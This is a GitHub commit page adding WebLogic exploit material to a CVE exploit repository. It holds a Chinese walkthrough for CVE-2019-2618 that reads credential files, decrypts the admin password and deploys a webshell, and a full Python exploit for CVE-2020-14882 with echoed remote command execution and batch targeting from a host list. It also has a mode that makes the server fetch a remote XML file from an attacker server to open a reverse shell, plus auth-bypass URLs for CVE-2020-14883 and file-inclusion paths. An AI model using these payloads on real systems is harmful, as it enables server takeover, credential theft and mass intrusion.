Skip to content

Commit

Permalink
优化目录
Browse files Browse the repository at this point in the history
  • Loading branch information
@helloexp
helloexp committed Mar 1, 2022
1 parent 1c30332 commit d47697d
Show file tree
Hide file tree
Showing 29 changed files with 251 additions and 2 deletions.
0 ...P/CVE-2018-2628 weblogic/CVE-2018-2628.py → ...018-2628 weblogic 反序列化漏洞/CVE-2018-2628.py
View file
File renamed without changes.
4 changes: 2 additions & 2 deletions 00-CVE_EXP/CVE-2018-2628 weblogic/readme.md → ...P/CVE-2018-2628 weblogic 反序列化漏洞/readme.md
View file
Original file line number Diff line number Diff line change
@@ -1,5 +1,5 @@
# weblogic反序列化漏洞批量检测脚本
---
## weblogic反序列化漏洞批量检测脚本

### Reference
* https://xz.aliyun.com/t/2292

Expand Down
43 changes: 43 additions & 0 deletions 00-CVE_EXP/CVE-2019-2618 弱口令&任意文件上传漏洞/README.MD
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,43 @@
# CVE-2019-2618 弱口令&任意文件上传漏洞

> 利用任意文件读取来获取weblogic的弱口令登录进入后台,然后通过上传getshell,通过构造任意文件下载漏洞环境读取到后台用户名和密码,然后登陆进后台,上传webshell。
## 影响版本
WebLogic 10.3.6.0、12.1.3.0、12.2.1.3

## 漏洞复现
1. 任意文件读取
访问`http://IP:7001/hello/file.jsp?path=/etc/passwd` 成功获取到账号和密码

![任意文件读取](images/任意文件读取.png) ![pass](images/password.png)

不过只能读取一些文件,如何更深层次利用这个漏洞呢?weblogic密码使用AES(老版本3DES)加密,对称加密可解密,只需要找到用户的密文与加密时的密钥即可。这两个文件均位于base_domain下,名为SerializedSystemIni.dat和config.xml。SerializedSystemIni.dat是一个二进制文件,所以一定要用burpsuite来读取,用浏览器直接下载可能引入一些干扰字符。在burp里选中读取到的那一串乱码,这就是密钥,右键copy to file就可以保存成一个文件:

`http://yourIp:7001/hello/file.jsp?path=security/SerializedSystemIni.dat`

![SerializedSystemIni.dat](images/SerializedSystemIni.dat.png)

config.xml是base_domain的全局配置文件,所以乱七八糟的内容比较多,找到其中的的值,即为加密后的管理员密码

`http://yourIP:7001/hello/file.jsp?path=config/config.xml`

![config.xml](images/config.xml.png)

使用解密工具进行解密

![decrypt](images/decrypt.png)

2. 后台上传getshell
使用解密后的账号密码登录后台,weblogic常见的弱密码
`https://cirt.net/passwords?criteria=weblogic
这里使用 用户名:weblogic 密码:Oracle@123 登录`

进入后台后点击左边的部署,找到可以上传文件的地址
![deploy](images/deploy.png)
这里使用冰蝎里面自带的jsp一句话生成war马
`jar -cvf shell.war shell.jsp`
生成war后将war马部署上去
![muma1](images/muma1.png)
![muma1](images/muma2.png)
使用冰蝎进行连接(默认密码为rebeyond),成功getshell
![muma1](images/muma3.png)
Binary file added 00-CVE_EXP/CVE-2019-2618 弱口令&任意文件上传漏洞/images/SerializedSystemIni.dat.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 00-CVE_EXP/CVE-2019-2618 弱口令&任意文件上传漏洞/images/config.xml.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 00-CVE_EXP/CVE-2019-2618 弱口令&任意文件上传漏洞/images/decrypt.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 00-CVE_EXP/CVE-2019-2618 弱口令&任意文件上传漏洞/images/deploy.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 00-CVE_EXP/CVE-2019-2618 弱口令&任意文件上传漏洞/images/muma1.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 00-CVE_EXP/CVE-2019-2618 弱口令&任意文件上传漏洞/images/muma2.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 00-CVE_EXP/CVE-2019-2618 弱口令&任意文件上传漏洞/images/muma3.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 00-CVE_EXP/CVE-2019-2618 弱口令&任意文件上传漏洞/images/password.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 00-CVE_EXP/CVE-2019-2618 弱口令&任意文件上传漏洞/images/任意文件读取.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 00-CVE_EXP/CVE-2019-2618 弱口令&任意文件上传漏洞/weblogic解密工具/lib/bcprov-jdk15on-152.jar
View file
Binary file not shown.
Binary file added 00-CVE_EXP/CVE-2019-2618 弱口令&任意文件上传漏洞/weblogic解密工具/weblogic_decrypt.jar
View file
Binary file not shown.
109 changes: 109 additions & 0 deletions 00-CVE_EXP/CVE-2020-14882 weblogic RCE 漏洞/CVE-2020-14882_ALL.py
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,109 @@
#coding:utf-8
import requests
import sys
import argparse
import http.client

http.client.HTTPConnection._http_vsn = 10
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'

requests.packages.urllib3.disable_warnings()


#功能1方法:回显命令执行。
def command(url_cmd,headers_cmd,url):
try:
res = requests.get(url_cmd, headers = headers_cmd,timeout = 15, verify = False)
if "<html" not in res.text and "<TITLE" not in res.text :
print ("[+] Command success result:")
print (res.text)

else:
print ("[-] " + url + " not vulnerable or command error!")
except Exception as e:
#print (e)
print ("[-] " + url + " not vulnerable or command error!")


#功能2方法:无回显,命令执行,适用于Weblogic 10.x、12.x。
def weblogic_12(url_cmd,post_12,headers_12):
try:
res = requests.post(url_cmd, data = post_12, headers = headers_12,timeout = 15, verify = False)
#print ("[+] Attack complete!")
except Exception as e:
print ("[+] Attack complete!")

def main():
banner = """ _______ ________ ___ ___ ___ ___ __ _ _ ___ ___ ___
/ ____\ \ / / ____| |__ \ / _ \__ \ / _ \ /_ | || | / _ \ / _ \__ \
| | \ \ / /| |__ ______ ) | | | | ) | | | |______| | || || (_) | (_) | ) |
| | \ \/ / | __|______/ /| | | |/ /| | | |______| |__ _> _ < > _ < / /
| |____ \ / | |____ / /_| |_| / /_| |_| | | | | || (_) | (_) / /_
\_____| \/ |______| |____|\___/____|\___/ |_| |_| \___/ \___/____|
Author:GGyao
Github:https://github.com/GGyao
"""

print (banner)
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="Target URL; Example:http://ip:port。")
parser.add_argument("-f", "--file", help="Target File; Example:target.txt。")
parser.add_argument("-c", "--cmd", help="Commands to be executed; ")
parser.add_argument("-x", "--xml", help="Remote XML file; Example:http://vpsip/poc.xml; ")
args = parser.parse_args()

#功能1:命令回显。
if args.url != None and args.cmd != None:
url = args.url
url_cmd = args.url + """/console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("%5C%5CA").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')"""
headers_cmd = {
'User-Agent':'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0',
'cmd':args.cmd,
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Content-Type':'application/x-www-form-urlencoded'
}

#post_cmd = """_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.WorkAdapter+adapter+%3d+((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()%3b+java.lang.reflect.Field+field+%3d+adapter.getClass().getDeclaredField("connectionHandler")%3bfield.setAccessible(true)%3bObject+obj+%3d+field.get(adapter)%3bweblogic.servlet.internal.ServletRequestImpl+req+%3d+(weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj)%3b+String+cmd+%3d+req.getHeader("cmd")%3bString[]+cmds+%3d+System.getProperty("os.name").toLowerCase().contains("window")+%3f+new+String[]{"cmd.exe",+"/c",+cmd}+%3a+new+String[]{"/bin/sh",+"-c",+cmd}%3bif(cmd+!%3d+null+){+String+result+%3d+new+java.util.Scanner(new+java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\\A").next()%3b+weblogic.servlet.internal.ServletResponseImpl+res+%3d+(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req)%3b+res.getServletOutputStream().writeStream(new+weblogic.xml.util.StringInputStream(result))%3bres.getServletOutputStream().flush()%3bres.getWriter().write("")%3b}')"""


#command(url_cmd,post_cmd,headers_cmd,url)
command(url_cmd,headers_cmd,url)

#功能2:weblogic 12.x命令执行。
if args.url != None and args.xml != None:
url_cmd = args.url + '/console/images/%252e%252e/console.portal'
headers_12 = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Content-Type':'application/x-www-form-urlencoded'
}

post_12 = """_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22{}%22)""".format(args.xml)

weblogic_12(url_cmd,post_12,headers_12)

# 功能3:回显命令执行批量。
if args.file != None and args.cmd != None:
#print (1)
for File in open(args.file):
File = File.strip()
url_cmd = File + """/console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("%5C%5CA").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')"""
print ("[*] >>> Test:" + File)

url = File
headers_cmd = {
'User-Agent':'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0',
'cmd':args.cmd,
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Content-Type':'application/x-www-form-urlencoded'
}


#post_cmd = """_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.WorkAdapter+adapter+%3d+((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()%3b+java.lang.reflect.Field+field+%3d+adapter.getClass().getDeclaredField("connectionHandler")%3bfield.setAccessible(true)%3bObject+obj+%3d+field.get(adapter)%3bweblogic.servlet.internal.ServletRequestImpl+req+%3d+(weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj)%3b+String+cmd+%3d+req.getHeader("cmd")%3bString[]+cmds+%3d+System.getProperty("os.name").toLowerCase().contains("window")+%3f+new+String[]{"cmd.exe",+"/c",+cmd}+%3a+new+String[]{"/bin/sh",+"-c",+cmd}%3bif(cmd+!%3d+null+){+String+result+%3d+new+java.util.Scanner(new+java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\\A").next()%3b+weblogic.servlet.internal.ServletResponseImpl+res+%3d+(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req)%3b+res.getServletOutputStream().writeStream(new+weblogic.xml.util.StringInputStream(result))%3bres.getServletOutputStream().flush()%3bres.getWriter().write("")%3b}')"""
command(url_cmd,headers_cmd,url)


if __name__=="__main__":
main()
56 changes: 56 additions & 0 deletions 00-CVE_EXP/CVE-2020-14882 weblogic RCE 漏洞/README.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,56 @@
# CVE-2020-14882 RCE 漏洞
>CVE-2020-14882_ALL综合利用工具,支持命令回显检测、批量命令回显、外置xml无回显命令执行等功能。
>
>需要模块:requests、http.client

### 选项

![](./images/1.png)

### 功能一:命令回显
python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c "net user"

![](./images/2.png)

python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c "whoami"

![](./images/3.png)

### 功能二:批量命令回显
```shell script
python3 CVE-2020-14882_ALL.py -f target.txt -c "whoami"
```
> target.txt 格式:http://x.x.x.x:xx,一行一个。
![](./images/4.png)

### 功能三:外置xml文件无回显命令执行
1. Linux反弹shell为例,编辑好poc.xml文件,开启python监听。

```xml
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>cmd</value>
</list>
</constructor-arg>
</bean>
</beans>
```

开启python监听。
![](./images/5.png)

nc开启监听。
![](./images/6.png)

2. 使用-x选项指定xml文件路径,发送payload。
```shell script
python3 CVE-2020-14882_ALL.py -u http://xxxx:7001 -x http://xxx:8000/poc.xml
```
![](./images/7.png)
3. 成功接收shell。
![](./images/8.png)

Binary file added 00-CVE_EXP/CVE-2020-14882 weblogic RCE 漏洞/images/1.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 00-CVE_EXP/CVE-2020-14882 weblogic RCE 漏洞/images/2.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 00-CVE_EXP/CVE-2020-14882 weblogic RCE 漏洞/images/3.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 00-CVE_EXP/CVE-2020-14882 weblogic RCE 漏洞/images/4.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 00-CVE_EXP/CVE-2020-14882 weblogic RCE 漏洞/images/5.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 00-CVE_EXP/CVE-2020-14882 weblogic RCE 漏洞/images/6.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 00-CVE_EXP/CVE-2020-14882 weblogic RCE 漏洞/images/7.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 00-CVE_EXP/CVE-2020-14882 weblogic RCE 漏洞/images/8.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
9 changes: 9 additions & 0 deletions 00-CVE_EXP/CVE-2020-14882 weblogic RCE 漏洞/poc.xml
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,9 @@
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>cmd</value>
</list>
</constructor-arg>
</bean>
</beans>
2 changes: 2 additions & 0 deletions 00-CVE_EXP/CVE-2020-14882 weblogic RCE 漏洞/target.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,2 @@
http://1.1.1.1:xx
http://1.1.1.1:xx
12 changes: 12 additions & 0 deletions 00-CVE_EXP/CVE-2020-14883 未授权访问/README.MD
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,12 @@
# weblogic 未授权访问漏洞
> 远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic Server Console。权限绕过漏洞(CVE-2020-14883),访问以下URL,未授权访问到管理后台页面(低权限的用户)
>
```shell script
/console/images/%252E%252E%252Fconsole.portal
/console/css/%252e%252e%252fconsole.portal (小写可绕过补丁)
/console/css/%25%32%65%25%32%65%25%32%66console.portal
```

![console](images/console.png)
此时的权限很低,并不能在后台安装应用
Binary file added 00-CVE_EXP/CVE-2020-14883 未授权访问/images/console.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
18 changes: 18 additions & 0 deletions 00-CVE_EXP/WebLogic Server 14.1.1.0.0 本地文件包含/readme.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,18 @@
# Oracle WebLogic Server 14.1.1.0.0 - 本地文件包含



## 受影响版本

```txt
12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0
```

## poc

```txt
GET .//META-INF/MANIFEST.MF
GET .//WEB-INF/web.xml
GET .//WEB-INF/portlet.xml
GET .//WEB-INF/weblogic.xml
```

0 comments on commit d47697d

Please sign in to comment.